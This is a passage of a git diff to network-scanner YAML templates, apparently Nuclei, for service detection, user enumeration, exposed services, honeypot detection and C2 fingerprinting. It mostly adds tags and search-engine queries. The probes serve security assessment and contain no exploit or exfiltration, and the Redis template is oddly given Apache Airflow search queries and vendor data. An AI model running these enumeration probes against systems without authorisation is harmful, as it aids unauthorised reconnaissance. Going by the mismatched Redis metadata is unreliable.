a/network/detection/mysql-detect.yaml +++ b/network/detection/mysql-detect.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: product:"MySQL" - verified: true - tags: network,mysql,db,detect - + tags: network,mysql,db,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/openssh-detect.yaml b/network/detection/openssh-detect.yaml index 3ebb5103c4..80924d06a7 100644 --- a/network/detection/openssh-detect.yaml +++ b/network/detection/openssh-detect.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: seclists,network,ssh,openssh,detect + tags: seclists,network,ssh,openssh,detect,detection,tcp tcp: - host: diff --git a/network/detection/pgsql-detect.yaml b/network/detection/pgsql-detect.yaml index a25fd6b1ae..a42ac2fb94 100644 --- a/network/detection/pgsql-detect.yaml +++ b/network/detection/pgsql-detect.yaml @@ -13,11 +13,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: port:5432 product:"PostgreSQL" - verified: true - tags: network,postgresql,db,detect - + tags: network,postgresql,db,detect,detection,tcp tcp: - inputs: - data: "000000500003000075736572006e75636c6569006461746162617365006e75636c6569006170706c69636174696f6e5f6e616d65007073716c00636c69656e745f656e636f64696e6700555446380000" diff --git a/network/detection/pop3-detect.yaml b/network/detection/pop3-detect.yaml index 47de28817e..69c1d80896 100644 --- a/network/detection/pop3-detect.yaml +++ b/network/detection/pop3-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: pop3 port:110 - verified: true - tags: network,detect,pop3,mail - + tags: network,detect,pop3,mail,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/proftpd-server-detect.yaml b/network/detection/proftpd-server-detect.yaml index f3fcaeb1c9..79c316da19 100644 --- a/network/detection/proftpd-server-detect.yaml +++ b/network/detection/proftpd-server-detect.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: product:"ProFTPD" - verified: true - tags: network,ftp,proftpd,detect - + tags: network,ftp,proftpd,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/rabbitmq-detect.yaml b/network/detection/rabbitmq-detect.yaml index 2ff24e5bd3..93b2e26950 100644 --- a/network/detection/rabbitmq-detect.yaml +++ b/network/detection/rabbitmq-detect.yaml @@ -9,11 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/amqp-info.html metadata: + verified: true max-request: 1 shodan-query: product:"RabbitMQ" - verified: true - tags: network,rabbitmq,oss,detect - + tags: network,rabbitmq,oss,detect,detection,tcp tcp: - inputs: - data: "AMQP\u0000\u0000\t\u0001" diff --git a/network/detection/rdp-detect.yaml b/network/detection/rdp-detect.yaml index b189855773..f42c92112c 100644 --- a/network/detection/rdp-detect.yaml +++ b/network/detection/rdp-detect.yaml @@ -10,10 +10,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - max-request: 1 verified: true - tags: network,windows,rdp,detect - + max-request: 1 + tags: network,windows,rdp,detect,detection,tcp tcp: - inputs: - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" diff --git a/network/detection/redis-detect.yaml b/network/detection/redis-detect.yaml index 833dde5b80..411a6d0cef 100644 --- a/network/detection/redis-detect.yaml +++ b/network/detection/redis-detect.yaml @@ -11,8 +11,20 @@ info: metadata: verified: true max-request: 2 - shodan-query: product:"redis" - tags: network,redis,detect + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + product: airflow + vendor: apache + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" + tags: network,redis,detect,detection,tcp tcp: - inputs: - data: "*1\r\n$4\r\ninfo\r\n" diff --git a/network/detection/riak-detect.yaml b/network/detection/riak-detect.yaml index a566d47a41..e429483b46 100644 --- a/network/detection/riak-detect.yaml +++ b/network/detection/riak-detect.yaml @@ -6,11 +6,10 @@ info: severity: info description: Riak is a distributed NoSQL key-value data store that offers high availability, fault tolerance, operational simplicity, and scalability. metadata: + verified: true max-request: 1 shodan-query: product:"Riak" - verified: true - tags: network,oss,detect,riak,nosql - + tags: network,oss,detect,riak,nosql,detection,tcp tcp: - inputs: - data: 0000000107 diff --git a/network/detection/rpcbind-portmapper-detect.yaml b/network/detection/rpcbind-portmapper-detect.yaml index bff4819a5c..32fb4eb24b 100644 --- a/network/detection/rpcbind-portmapper-detect.yaml +++ b/network/detection/rpcbind-portmapper-detect.yaml @@ -10,11 +10,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: port:"111" - verified: true - tags: network,rpcbind,portmap,detect - + tags: network,rpcbind,portmap,detect,detection,tcp tcp: - inputs: - data: 8000002836ed646d0000000000000002000186a0000000040000000400000000000000000000000000000000 diff --git a/network/detection/rsyncd-service-detect.yaml b/network/detection/rsyncd-service-detect.yaml index b146a8b776..84f97ace50 100644 --- a/network/detection/rsyncd-service-detect.yaml +++ b/network/detection/rsyncd-service-detect.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,rsyncd,detect + tags: network,rsyncd,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/rtsp-detect.yaml b/network/detection/rtsp-detect.yaml index 330b2e95be..69be4012b8 100644 --- a/network/detection/rtsp-detect.yaml +++ b/network/detection/rtsp-detect.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: RTSP/1.0 - verified: true - tags: network,rtsp,detect - + tags: network,rtsp,detect,detection,tcp tcp: - inputs: - data: 4f5054494f4e53207369703a6e6d205349502f322e300d0a5669613a205349502f322e302f544350206e6d3b6272616e63683d666f6f0d0a46726f6d3a203c7369703a6e6d406e6d3e3b7461673d726f6f740d0a546f3a203c7369703a6e6d32406e6d323e0d0a43616c6c2d49443a2035303030300d0a435365713a203432204f5054494f4e530d0a4d61782d466f7277617264733a2037300d0a436f6e74656e742d4c656e6774683a20300d0a436f6e746163743a203c7369703a6e6d406e6d3e0d0a4163636570743a206170706c69636174696f6e2f7364700d0a0d0a diff --git a/network/detection/sap-router.yaml b/network/detection/sap-router.yaml index 461f6b0cd0..10b43d9f8a 100644 --- a/network/detection/sap-router.yaml +++ b/network/detection/sap-router.yaml @@ -8,7 +8,7 @@ info: SAProuter is a software application that provides a remote connection between our customer's network and SAP. metadata: max-request: 1 - tags: network,sap,detect,saprouter + tags: network,sap,detect,saprouter,detection,tcp tcp: - inputs: diff --git a/network/detection/smtp-detect.yaml b/network/detection/smtp-detect.yaml index 5031317fb3..ee7a880920 100644 --- a/network/detection/smtp-detect.yaml +++ b/network/detection/smtp-detect.yaml @@ -7,8 +7,8 @@ info: description: | SMTP is part of the application layer of the TCP/IP protocol. Using a process called “store and forward,” SMTP moves your email on and across networks. metadata: - max-request: 4 - tags: network,service,smtp,detect,mail + max-request: 1 + tags: network,service,smtp,detect,mail,detection,tcp tcp: - inputs: diff --git a/network/detection/sshd-dropbear-detect.yaml b/network/detection/sshd-dropbear-detect.yaml index a4720e86f8..2ec3ca50eb 100644 --- a/network/detection/sshd-dropbear-detect.yaml +++ b/network/detection/sshd-dropbear-detect.yaml @@ -7,11 +7,10 @@ info: description: | Dropbear is a software package written by Matt Johnston that provides a Secure Shell-compatible server and client. It is designed as a replacement for standard OpenSSH for environments with low memory and processor resources, such as embedded systems metadata: + verified: true max-request: 1 shodan-query: product:"Dropbear sshd" - verified: true - tags: network,ssh,dropbear,detect - + tags: network,ssh,dropbear,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/starttls-mail-detect.yaml b/network/detection/starttls-mail-detect.yaml index c08e550132..69da87ea78 100644 --- a/network/detection/starttls-mail-detect.yaml +++ b/network/detection/starttls-mail-detect.yaml @@ -7,8 +7,8 @@ info: description: | STARTTLS is an email protocol command that tells an email server that an email client, including an email client running in a web browser, wants to turn an existing insecure connection into a secure one. metadata: - max-request: 4 - tags: mail,starttls,network,detect,smtp + max-request: 1 + tags: mail,starttls,network,detect,smtp,detection,tcp tcp: - inputs: diff --git a/network/detection/teamspeak3-detect.yaml b/network/detection/teamspeak3-detect.yaml index d82d3be2bf..cac95801e7 100644 --- a/network/detection/teamspeak3-detect.yaml +++ b/network/detection/teamspeak3-detect.yaml @@ -7,10 +7,10 @@ info: description: | ServerQuery is a commandline based administration tool/feature of TeamSpeak 3 server. metadata: + verified: true max-request: 1 shodan-query: product:"TeamSpeak 3 ServerQuery" - verified: true - tags: network,service,teamspeak3,detect + tags: network,service,teamspeak3,detect,detection,tcp tcp: - inputs: - data: "\r\n" diff --git a/network/detection/telnet-detect.yaml b/network/detection/telnet-detect.yaml index e927b88941..9e0a233339 100644 --- a/network/detection/telnet-detect.yaml +++ b/network/detection/telnet-detect.yaml @@ -7,11 +7,10 @@ info: description: | Telnet is a network protocol used to virtually access a computer and to provide a two-way, collaborative and text-based communication channel between two machines. metadata: + verified: true max-request: 1 shodan-query: port:23 telnet - verified: true - tags: network,telnet,detect - + tags: network,telnet,detect,detection,tcp tcp: - inputs: - data: "\n" diff --git a/network/detection/totemomail-smtp-detect.yaml b/network/detection/totemomail-smtp-detect.yaml index 09fa959d21..4799e650b1 100644 --- a/network/detection/totemomail-smtp-detect.yaml +++ b/network/detection/totemomail-smtp-detect.yaml @@ -7,8 +7,8 @@ info: description: | Totemomail is a comprehensive email solution designed to address all aspects of digital communication security. metadata: - max-request: 3 - tags: mail,smtp,network,totemomail,detect + max-request: 1 + tags: mail,smtp,network,totemomail,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/vmware-authentication-daemon-detect.yaml b/network/detection/vmware-authentication-daemon-detect.yaml index e7d189ea39..b51db23958 100644 --- a/network/detection/vmware-authentication-daemon-detect.yaml +++ b/network/detection/vmware-authentication-daemon-detect.yaml @@ -7,11 +7,10 @@ info: description: | vmauthd is the VMWare authentication daemon that is included with many VMWare products, including ESX(i), and Workstation. metadata: + verified: true max-request: 1 shodan-query: product:"VMware Authentication Daemon" - verified: true - tags: network,vmware,authenticated,detect - + tags: network,vmware,authenticated,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/vnc-service-detect.yaml b/network/detection/vnc-service-detect.yaml index 88e236633e..410d518ce6 100644 --- a/network/detection/vnc-service-detect.yaml +++ b/network/detection/vnc-service-detect.yaml @@ -9,7 +9,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,vnc,service,detect + tags: network,vnc,service,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/weblogic-iiop-detect.yaml b/network/detection/weblogic-iiop-detect.yaml index 13d3028014..10778d7b20 100644 --- a/network/detection/weblogic-iiop-detect.yaml +++ b/network/detection/weblogic-iiop-detect.yaml @@ -8,7 +8,7 @@ info: The IIOP (Internet Inter-ORB Protocol) protocol makes it possible for distributed programs written in different programming languages to communicate over the Internet. metadata: max-request: 1 - tags: network,weblogic,detect,oracle,iiop + tags: network,weblogic,detect,oracle,iiop,detection,tcp tcp: - inputs: - data: "{{hex_decode('47494f50010200030000001700000002000000000000000b4e616d6553657276696365')}}" diff --git a/network/detection/weblogic-t3-detect.yaml b/network/detection/weblogic-t3-detect.yaml index 918e7fe59f..ad4b832f9f 100644 --- a/network/detection/weblogic-t3-detect.yaml +++ b/network/detection/weblogic-t3-detect.yaml @@ -12,7 +12,7 @@ info: Ensure proper configuration and security measures are in place for Weblogic T3 Protocol metadata: max-request: 2 - tags: network,weblogic,detect,t3,oracle + tags: network,weblogic,detect,t3,oracle,detection,tcp tcp: - inputs: diff --git a/network/detection/wing-ftp-detect.yaml b/network/detection/wing-ftp-detect.yaml index f73ee40f28..f458f2db5d 100644 --- a/network/detection/wing-ftp-detect.yaml +++ b/network/detection/wing-ftp-detect.yaml @@ -10,7 +10,7 @@ info: max-request: 1 verified: true shodan-query: "Wing FTP Server" - tags: network,ftp,wing,detect + tags: network,ftp,wing,detect,detection,tcp tcp: - inputs: diff --git a/network/detection/ws_ftp-ssh-detect.yaml b/network/detection/ws_ftp-ssh-detect.yaml index 56a7c89681..96c9c38eab 100644 --- a/network/detection/ws_ftp-ssh-detect.yaml +++ b/network/detection/ws_ftp-ssh-detect.yaml @@ -8,16 +8,26 @@ info: WS_FTP-SSH service was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: verified: true max-request: 1 vendor: progress product: ws_ftp - shodan-query: "WS_FTP port:22" - tags: network,ssh,ws_ftp,detect,progress - + shodan-query: + - "WS_FTP port:22" + - ws_ftp port:22 + - http.title:"ad hoc transfer" + - http.title:"ws_ftp server web transfer" + fofa-query: + - title="ws_ftp server web transfer" + - title="ad hoc transfer" + google-query: + - intitle:"ws_ftp server web transfer" + - intitle:"ad hoc transfer" + censys-query: services.http.request.uri="*/thinclient/wtm/public/index.html" + tags: network,ssh,ws_ftp,detect,progress,detection,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/detection/xlight-ftp-service-detect.yaml b/network/detection/xlight-ftp-service-detect.yaml index 7b6ee3d28d..768b03b4be 100644 --- a/network/detection/xlight-ftp-service-detect.yaml +++ b/network/detection/xlight-ftp-service-detect.yaml @@ -7,11 +7,10 @@ info: description: | The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network. metadata: + verified: true max-request: 1 shodan-query: product:"Xlight ftpd" - verified: true - tags: network,ftp,xlight,detect - + tags: network,ftp,xlight,detect,detection,tcp tcp: - inputs: diff --git a/network/enumeration/beanstalk-service.yaml b/network/enumeration/beanstalk-service.yaml index ebd0a6e0f9..6ecb51e21a 100644 --- a/network/enumeration/beanstalk-service.yaml +++ b/network/enumeration/beanstalk-service.yaml @@ -9,11 +9,10 @@ info: reference: - https://jhadiary.wordpress.com/2016/05/18/beanstalk-helping-commands/ metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: port:11300 "cmd-peek" - tags: network,beanstalk,detect,enum - + tags: network,beanstalk,detect,enum,tcp tcp: - inputs: - data: "stats\r\n" diff --git a/network/enumeration/kafka-topics-list.yaml b/network/enumeration/kafka-topics-list.yaml index abec99584e..90156a3d64 100644 --- a/network/enumeration/kafka-topics-list.yaml +++ b/network/enumeration/kafka-topics-list.yaml @@ -7,11 +7,10 @@ info: description: | Kafka topics are logical data streams that store and organize messages in Apache Kafka. They provide a way for data to be published, subscribed to, and processed by Kafka consumers. metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: product:"Kafka" - tags: network,detect,enum,kafka,apache - + tags: network,detect,enum,kafka,apache,tcp tcp: - inputs: - data: 00000020000300000000000200126b61666b612d707974686f6e2d322e302e3200000000 diff --git a/network/enumeration/mongodb-info-enum.yaml b/network/enumeration/mongodb-info-enum.yaml index e9d2f287a1..dbda8ba16c 100644 --- a/network/enumeration/mongodb-info-enum.yaml +++ b/network/enumeration/mongodb-info-enum.yaml @@ -12,11 +12,10 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: mongodb server information - verified: true - tags: network,mongodb,enum - + tags: network,mongodb,enum,tcp tcp: - inputs: - data: 3b0000003c300000ffffffffd40700000000000061646d696e2e24636d640000000000ffffffff14000000106275696c64696e666f000100000000 diff --git a/network/enumeration/niagara-fox-info-enum.yaml b/network/enumeration/niagara-fox-info-enum.yaml index a88e118181..1515a39ec2 100644 --- a/network/enumeration/niagara-fox-info-enum.yaml +++ b/network/enumeration/niagara-fox-info-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/fox-info.html metadata: + verified: true max-request: 1 shodan-query: product:"Niagara Fox" - verified: true - tags: network,fox,niagara,enum - + tags: network,fox,niagara,enum,tcp tcp: - inputs: - data: "fox a 1 -1 fox hello\n{\nfox.version=s:1.0\nid=i:1\n};;\n" diff --git a/network/enumeration/psql-user-enum.yaml b/network/enumeration/psql-user-enum.yaml index d453aeed64..c07fbcd29b 100644 --- a/network/enumeration/psql-user-enum.yaml +++ b/network/enumeration/psql-user-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://medium.com/@netscylla/pentesters-guide-to-postgresql-hacking-59895f4f007 metadata: + verified: "true" max-request: 1 shodan-query: port:5432 product:"PostgreSQL" - verified: "true" - tags: network,postgresql,db,unauth,enum,psql - + tags: network,postgresql,db,unauth,enum,psql,tcp tcp: - inputs: - data: "{{hex_encode('\u0000\u0000\u0000{{str}}\u0000\u0003\u0000\u0000user\u0000{{users}}\u0000database\u0000{{users}}\u0000application_name\u0000psql\u0000client_encoding\u0000UTF8\u0000\u0000')}}" diff --git a/network/enumeration/smtp/smtp-commands-enum.yaml b/network/enumeration/smtp/smtp-commands-enum.yaml index 6388ecc749..0b5dbb8fed 100644 --- a/network/enumeration/smtp/smtp-commands-enum.yaml +++ b/network/enumeration/smtp/smtp-commands-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/smtp-commands.html metadata: - max-request: 4 - shodan-query: smtp verified: true - tags: network,enum,smtp,mail - + max-request: 1 + shodan-query: smtp + tags: network,enum,smtp,mail,tcp tcp: - inputs: - data: "EHLO x\r\n" diff --git a/network/enumeration/smtp/smtp-user-enum.yaml b/network/enumeration/smtp/smtp-user-enum.yaml index 42a5bde0f2..0e427c547d 100644 --- a/network/enumeration/smtp/smtp-user-enum.yaml +++ b/network/enumeration/smtp/smtp-user-enum.yaml @@ -9,10 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/smtp-enum-users.html metadata: - max-request: 4 - shodan-query: smtp verified: true - tags: network,enum,smtp,mail + max-request: 1 + shodan-query: smtp + tags: network,enum,smtp,mail,tcp tcp: - inputs: diff --git a/network/exposures/cisco-smi-exposure.yaml b/network/exposures/cisco-smi-exposure.yaml index 8ee1ea69ba..67e08c76fd 100644 --- a/network/exposures/cisco-smi-exposure.yaml +++ b/network/exposures/cisco-smi-exposure.yaml @@ -17,7 +17,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: network,cisco,smi,exposure + tags: network,cisco,smi,exposure,tcp tcp: - inputs: diff --git a/network/exposures/exposed-adb.yaml b/network/exposures/exposed-adb.yaml index f8615f9cd7..16e2cb1d51 100644 --- a/network/exposures/exposed-adb.yaml +++ b/network/exposures/exposed-adb.yaml @@ -11,7 +11,7 @@ info: - https://www.securezoo.com/2018/06/thousands-of-android-devices-leave-debug-port-5555-exposed/ metadata: max-request: 1 - tags: network,adb,rce,android,exposure + tags: network,adb,rce,android,exposure,tcp tcp: - inputs: diff --git a/network/exposures/exposed-dockerd.yaml b/network/exposures/exposed-dockerd.yaml index 4bbec4da52..d5ebbf6c5b 100644 --- a/network/exposures/exposed-dockerd.yaml +++ b/network/exposures/exposed-dockerd.yaml @@ -7,11 +7,10 @@ info: description: | Docker Daemon exposed on the network map can help remote attacker to gain access to the Docker containers and potentially the host system. metadata: + verified: true max-request: 1 shodan-query: port:2375 product:"docker" - verified: true - tags: network,docker,exposure - + tags: network,docker,exposure,tcp tcp: - inputs: - data: "Docker:\nVersion:\n" diff --git a/network/exposures/exposed-redis.yaml b/network/exposures/exposed-redis.yaml index 7e561cf726..ea11472061 100644 --- a/network/exposures/exposed-redis.yaml +++ b/network/exposures/exposed-redis.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-306 metadata: max-request: 2 - tags: network,redis,unauth,exposure + tags: network,redis,unauth,exposure,tcp tcp: - inputs: diff --git a/network/exposures/exposed-zookeeper.yaml b/network/exposures/exposed-zookeeper.yaml index 31d8f2b33f..2a402b16f8 100644 --- a/network/exposures/exposed-zookeeper.yaml +++ b/network/exposures/exposed-zookeeper.yaml @@ -9,7 +9,7 @@ info: - https://zookeeper.apache.org/security.html metadata: max-request: 1 - tags: network,zookeeper,unauth,exposure + tags: network,zookeeper,unauth,exposure,tcp tcp: - inputs: diff --git a/network/honeypot/adbhoney-honeypot-cnxn-detect.yaml b/network/honeypot/adbhoney-honeypot-cnxn-detect.yaml index e1cf0c28ef..b23a0b7e66 100644 --- a/network/honeypot/adbhoney-honeypot-cnxn-detect.yaml +++ b/network/honeypot/adbhoney-honeypot-cnxn-detect.yaml @@ -8,13 +8,14 @@ info: ADBHoney honeypot has been identified. The response to the 'adb connect' command differs from real installations, signaling a possible deceptive setup. metadata: - max-request: 1 - product: adb - shodan-query: product:Android Debug Bridge (ADB) && SM-G960F - vendor: android verified: true - tags: adbhoney,android,adb,honeypot,ir,cti,network - + max-request: 1 + vendor: android + product: adb + shodan-query: + - product:Android Debug Bridge (ADB) && SM-G960F + - product:android debug bridge (adb) && sm-g960f + tags: adbhoney,android,adb,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # CNXN diff --git a/network/honeypot/adbhoney-honeypot-shell-detect.yaml b/network/honeypot/adbhoney-honeypot-shell-detect.yaml index 2815e73bb1..6f149773f8 100644 --- a/network/honeypot/adbhoney-honeypot-shell-detect.yaml +++ b/network/honeypot/adbhoney-honeypot-shell-detect.yaml @@ -8,13 +8,14 @@ info: ADBHoney honeypot has been identified. The response to the 'adb shell pwd' command differs from real installations, signaling a possible deceptive setup. metadata: - max-request: 1 - product: adb - shodan-query: product:Android Debug Bridge (ADB) && SM-G960F - vendor: android verified: true - tags: adbhoney,android,adb,honeypot,ir,cti,network - + max-request: 1 + vendor: android + product: adb + shodan-query: + - product:Android Debug Bridge (ADB) && SM-G960F + - product:android debug bridge (adb) && sm-g960f + tags: adbhoney,android,adb,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "434e584e0100000100001000ea000000445b0000bcb1a7b1" # CNXN diff --git a/network/honeypot/conpot-siemens-honeypot-detect.yaml b/network/honeypot/conpot-siemens-honeypot-detect.yaml index 6cbeef73bc..657046b336 100644 --- a/network/honeypot/conpot-siemens-honeypot-detect.yaml +++ b/network/honeypot/conpot-siemens-honeypot-detect.yaml @@ -8,13 +8,15 @@ info: A Conpot (Siemens) honeypot has been identified. The response to a first packet of a connection attempt differs from real installations, signaling a possible deceptive setup. metadata: - max-request: 1 verified: true + max-request: 1 vendor: conpot product: siemens - shodan-query: html:"Overview - Siemens, SIMATIC" - tags: conpot,siemens,honeypot,ir,cti,network - + shodan-query: + - html:"Overview - Siemens, SIMATIC" + - http.html:"overview - siemens, simatic" + fofa-query: body="overview - siemens, simatic" + tags: conpot,siemens,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "0300001611e00000000400c1020100c2020102c0010a" diff --git a/network/honeypot/cowrie-ssh-honeypot-detect.yaml b/network/honeypot/cowrie-ssh-honeypot-detect.yaml index da526c0d5a..70749e2433 100644 --- a/network/honeypot/cowrie-ssh-honeypot-detect.yaml +++ b/network/honeypot/cowrie-ssh-honeypot-detect.yaml @@ -9,10 +9,9 @@ info: The response to a wrong SSH version differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - product: ssh vendor: cowrie - tags: cowrie,twisted,ssh,honeypot,ir,cti,network - + product: ssh + tags: cowrie,twisted,ssh,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "SSH-1337-OpenSSH_9.0\r\n" diff --git a/network/honeypot/dionaea-ftp-honeypot-detect.yaml b/network/honeypot/dionaea-ftp-honeypot-detect.yaml index b32d00318a..e0f388d162 100644 --- a/network/honeypot/dionaea-ftp-honeypot-detect.yaml +++ b/network/honeypot/dionaea-ftp-honeypot-detect.yaml @@ -9,10 +9,9 @@ info: The response to the 'PASS' command differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - product: ftp vendor: dionaea - tags: dionaea,ftp,honeypot,ir,cti,network - + product: ftp + tags: dionaea,ftp,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "USER root\r\n" diff --git a/network/honeypot/dionaea-mqtt-honeypot-detect.yaml b/network/honeypot/dionaea-mqtt-honeypot-detect.yaml index 4c7ab44734..8314e1b352 100644 --- a/network/honeypot/dionaea-mqtt-honeypot-detect.yaml +++ b/network/honeypot/dionaea-mqtt-honeypot-detect.yaml @@ -8,13 +8,14 @@ info: A Dionaea MQTT honeypot has been identified. The response to a MQTTv5 packet differs from real installations, signaling a possible deceptive setup. metadata: - max-request: 1 - product: mqtt - shodan-query: product:"MQTT" - vendor: dionaea verified: true - tags: dionaea,mqtt,honeypot,ir,cti,network - + max-request: 1 + vendor: dionaea + product: mqtt + shodan-query: + - product:"MQTT" + - product:"mqtt" + tags: dionaea,mqtt,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "101000044d5154540502003c032100140000" diff --git a/network/honeypot/dionaea-mysql-honeypot-detect.yaml b/network/honeypot/dionaea-mysql-honeypot-detect.yaml index 6cdc4bab52..6a346b1eef 100644 --- a/network/honeypot/dionaea-mysql-honeypot-detect.yaml +++ b/network/honeypot/dionaea-mysql-honeypot-detect.yaml @@ -9,10 +9,10 @@ info: The response to a connection command differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - product: mysql vendor: dionaea - tags: dionaea,mysql,honeypot,ir,cti,network - + product: mysql + shodan-query: product:"mysql" + tags: dionaea,mysql,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "\x4a\x00\x00\x00\x0a\x35\x2e\x31\x2e\x32\x39\x00\x0b\x00\x00\x00\x21\x3e\x34\x1b\x51\x3f\x34\x33\x60\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" diff --git a/network/honeypot/dionaea-smb-honeypot-detect.yaml b/network/honeypot/dionaea-smb-honeypot-detect.yaml index 49d89e5226..e2af0c93c1 100644 --- a/network/honeypot/dionaea-smb-honeypot-detect.yaml +++ b/network/honeypot/dionaea-smb-honeypot-detect.yaml @@ -9,11 +9,10 @@ info: The response to an SMB connection packet differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - shodan-query: port:445 vendor: dionaea product: dionaea - tags: dionaea,smb,honeypot,ir,cti,network - + shodan-query: port:445 + tags: dionaea,smb,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "00000045ff534d4272000000000801c8000000000000000000000000ffff0100ffff0000002200024e54204c4d20302e31320002534d4220322e3030320002534d4220322e3f3f3f00" diff --git a/network/honeypot/gaspot-honeypot-detect.yaml b/network/honeypot/gaspot-honeypot-detect.yaml index 9eb681263d..1e4c39adf8 100644 --- a/network/honeypot/gaspot-honeypot-detect.yaml +++ b/network/honeypot/gaspot-honeypot-detect.yaml @@ -9,11 +9,10 @@ info: The response to the '^AI21400' command differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 + vendor: gaspot product: veeder-root shodan-query: port:10001 - vendor: gaspot - tags: gaspot,veeder-root,ics,honeypot,ir,cti,network - + tags: gaspot,veeder-root,ics,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "^AI21400" diff --git a/network/honeypot/mailoney-honeypot-detect.yaml b/network/honeypot/mailoney-honeypot-detect.yaml index 5f1defcd34..72b9c8e91d 100644 --- a/network/honeypot/mailoney-honeypot-detect.yaml +++ b/network/honeypot/mailoney-honeypot-detect.yaml @@ -9,10 +9,10 @@ info: The response to the 'HELP' command differs from real installations, signaling a possible deceptive setup. metadata: max-request: 1 - product: exim vendor: mailoney - tags: mailoney,exim,smtp,honeypot,ir,cti,network - + product: exim + shodan-query: cpe:"cpe:2.3:a:exim:exim" + tags: mailoney,exim,smtp,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "HELP\r\n" diff --git a/network/honeypot/redis-honeypot-detect.yaml b/network/honeypot/redis-honeypot-detect.yaml index 5f4ff72394..7052be60df 100644 --- a/network/honeypot/redis-honeypot-detect.yaml +++ b/network/honeypot/redis-honeypot-detect.yaml @@ -11,11 +11,12 @@ info: cpe: cpe:2.3:a:redis:redis:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: redis - shodan-query: redis vendor: redis - tags: redis,honeypot,ir,cti,network - + product: redis + shodan-query: + - redis + - redis_version + tags: redis,honeypot,ir,cti,network,tcp tcp: - inputs: - data: "QUIT" diff --git a/network/jarm/c2/cobalt-strike-c2-jarm.yaml b/network/jarm/c2/cobalt-strike-c2-jarm.yaml index d60ce89b52..39601ecb44 100644 --- a/network/jarm/c2/cobalt-strike-c2-jarm.yaml +++ b/network/jarm/c2/cobalt-strike-c2-jarm.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: ssl.jarm:07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1+port:443 - tags: jarm,network,c2,ir,osint,cti,cobalt-strike + tags: jarm,network,c2,ir,osint,cti,cobalt-strike,tcp tcp: - inputs: - data: 2E diff --git a/network/jarm/c2/covenant-c2-jarm.yaml b/network/jarm/c2/covenant-c2-jarm.yaml index 0589a5d0bf..e86d244e78 100644 --- 